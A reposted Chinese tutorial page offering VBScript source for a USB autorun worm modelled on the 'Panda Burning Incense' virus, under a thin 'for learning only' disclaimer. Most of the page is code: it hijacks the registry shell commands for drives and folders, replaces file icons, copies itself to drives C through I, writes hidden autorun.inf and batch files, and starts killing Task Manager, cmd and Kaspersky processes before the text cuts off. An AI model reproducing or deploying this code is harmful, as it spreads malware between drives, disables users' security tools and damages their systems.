vb模拟熊猫烧香

时间：2022-05-20 03:14:20 阅读：最新文章文档下载

说明：文章内容仅供预览，部分内容可能不全。下载后的文档，内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的，是否完整无缺。

VB也模拟熊猫烧香！

使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术，切忌不要搞破坏，如果有人用本人代码破坏,后果自负

'使用户不能通过双击打开硬盘，这里还可以修改为使其不能通过双击打开文件夹，同理，不赘续 wsh.Regwrite

"HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKCR\Drive\shell\","auto"

wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"

wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite

"HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"

'修改默认文件图标这里可以换成可爱的熊猫哦

wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"

wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" wsh.Regwrite

"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊，开个小小的玩笑" wsh.Regwrite

"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了!" '复制自身到C,D,E,F,U盘 myfile.copy "c:\" myfile.copy "D:\" myfile.copy "E:\" myfile.copy "F:\"

myfile.copy "I:\" myfile.attributes=34

'定义Autorun.inf 的内容这个就是u盘病毒必须的代码部分这里可以简单写

If fso.FileExists("C:\autorun.inf") Then

Set objFolder = fso.GetFile("C:\autorun.inf") Else

wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_ &"&& echo open=NYboy.bat >>C:\autorun.inf"_

&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_

&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_ &"&& echo shell=Auto>>C:\autorun.inf"_ &"&& attrib +h +s +r C:\autorun.inf" ,0

set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture) autobatc.writeline("NYboy.vbs") End If

If fso.FileExists("D:\autorun.inf") Then

Set objFolder = fso.GetFile("D:\autorun.inf") Else

wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_ &"&& echo open=NYboy.bat >>D:\autorun.inf"_

&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_

&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_ &"&& echo shell=Auto>>D:\autorun.inf"_ &"&& attrib +h +s +r D:\autorun.inf" ,0

set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture) autobatd.writeline("NYboy.vbs") End If

If fso.FileExists("E:\autorun.inf") Then

Set objFolder = fso.GetFile("E:\autorun.inf") Else

wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_ &"&& echo open=NYboy.bat >>E:\autorun.inf"_

&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_

&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_ &"&& echo shell=Auto>>E:\autorun.inf"_ &"&& attrib +h +s +r E:\autorun.inf" ,0

set autobate=fso.createtextfile("E:\NYboy.bat",1,ture) autobate.writeline("NYboy.vbs") End If

If fso.FileExists("F:\autorun.inf") Then

Set objFolder = fso.GetFile("F:\autorun.inf") Else

wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_ &"&& echo open=NYboy.bat >>F:\autorun.inf"_

&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_

&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_ &"&& echo shell=Auto>>F:\autorun.inf"_ &"&& attrib +h +s +r F:\autorun.inf" ,0

set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture) autobatf.writeline("NYboy.vbs") End If

If fso.FileExists("I:\autorun.inf") Then

Set objFolder = fso.GetFile("I:\autorun.inf") Else

wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_ &"&& echo open=NYboy.bat >>I:\autorun.inf"_

&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_

&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_ &"&& echo shell=Auto>>I:\autorun.inf"_ &"&& attrib +h +s +r I:\autorun.inf" ,0

set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture) autobatf.writeline("NYboy.vbs") End If

'设置病毒体属性为系统只读隐藏

wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_ &"&& attrib +h +s +r D:\NYboy.bat"_ &"&& attrib +h +s +r E:\NYboy.bat"_ &"&& attrib +h +s +r F:\NYboy.bat"_ &"&& attrib +h +s +r I:\NYboy.bat"

'强制结束某些进程,比如QQ，记事本，网页，批处理文件，卡巴，realplay等进程,运行后打不开这些文件 do

set ws=getobject("winmgmts:\\.\root\cimv2")

set pp=ws.execquery("select * from win32_process where

name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'") for each i in pp

本文来源：https://www.wddqw.com/doc/6ed6a65f312b3169a451a404.html

相关文章：

正在阅读：

vb模拟熊猫烧香01-01

给战后小朋友的一封信作文300字01-01

尊重生命01-01

幼儿园冬季运动会精彩串词01-01

试述电子商务存在的问题以及对策研究01-01

古诗鉴赏解析精选01-01

2018年人民大学宗教学考研参考书目01-01

为同事写推荐信怎么写01-01

体谅的意思01-01

上一篇：运行bat时隐藏cmd窗口的方法(bat隐藏窗口隐藏运行bat文件) 下一篇：Bat exercise, practice, and training device